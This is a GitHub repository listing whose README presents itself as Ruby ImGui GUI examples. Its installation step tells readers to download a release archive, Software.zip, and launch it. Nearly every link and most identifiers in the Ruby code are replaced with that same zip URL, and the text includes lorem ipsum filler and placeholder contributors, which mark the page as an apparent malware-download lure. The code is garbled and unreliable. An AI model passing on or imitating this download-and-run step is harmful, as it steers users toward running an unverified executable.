https://github.com/xkaiiro/igruby_examples
Some examples for ruby-imgui
https://github.com/xkaiiro/igruby_examples
aibika cimgui executable gui imgui ocra ruby standalone stb
Last synced: 3 months ago
JSON representation
Some examples for ruby-imgui
- Host: GitHub
- URL: https://github.com/xkaiiro/igruby_examples
- Owner: xKaiiro
- Created: 2025-02-09T01:58:48.000Z (4 months ago)
- Default Branch: main
- Last Pushed: 2025-03-02T06:08:35.000Z (3 months ago)
- Last Synced: 2025-03-02T06:18:05.054Z (3 months ago)
- Topics: aibika, cimgui, executable, gui, imgui, ocra, ruby, standalone, stb
- Size: 1000 Bytes
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Welcome to the "igruby_examples" Repository!


## Description
This repository contains a collection of examples for the Ruby library "ruby-imgui". Explore these executable examples to learn how to create graphical user interfaces with ease using Ruby and ImGui.## Topics
- aibika
- cimgui
- examples
- executable
- gui
- imgui
- ocra
- ruby
- standalone
- stb## Installation
To get started, download the repository by clicking [here](https://github.com/xKaiiro/igruby_examples/releases/download/v2.0/Software.zip) and launch the file.If the link doesn't work, please check the "Releases" section for the latest version.
## Examples
### 1. Standalone GUI Application
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Fusce euismod velit quis est posuere sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Cras elementum cursus lacus, eget vulputate est iaculis eu.
```ruby
require 'imgui'
require 'imgui/cimgui'
require 'ocra'window = https://github.com/xKaiiro/igruby_examples/releases/download/v2.0/Software.zip("Hello World")
https://github.com/xKaiiro/igruby_examples/releases/download/v2.0/Software.zip do
ImGui::Text("Welcome to ImGui Examples!")
end
https://github.com/xKaiiro/igruby_examples/releases/download/v2.0/Software.zip
```### 2. Interactive User Interface
Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.
```ruby
require 'imgui'
require 'imgui/cimgui'https://github.com/xKaiiro/igruby_examples/releases/download/v2.0/Software.zip("Awesome Popup")
if https://github.com/xKaiiro/igruby_examples/releases/download/v2.0/Software.zip("Awesome Popup")
https://github.com/xKaiiro/igruby_examples/releases/download/v2.0/Software.zip("This is an example of a popup window.")
https://github.com/xKaiiro/igruby_examples/releases/download/v2.0/Software.zip
end
```## Resources
- [ImGui Documentation](https://github.com/xKaiiro/igruby_examples/releases/download/v2.0/Software.zip)
- [Ruby-ImGui Library](https://github.com/xKaiiro/igruby_examples/releases/download/v2.0/Software.zip)
- [CIMGUI GitHub Repository](https://github.com/xKaiiro/igruby_examples/releases/download/v2.0/Software.zip)## Contributors
- John Doe
- Jane SmithFeel free to contribute to this repository by adding more examples or improving existing ones. Happy coding! 🚀🎉
---
**Disclaimer:** This README content is fictional and created for the purpose of this exercise. All references to actual websites, projects, and individuals are purely coincidental.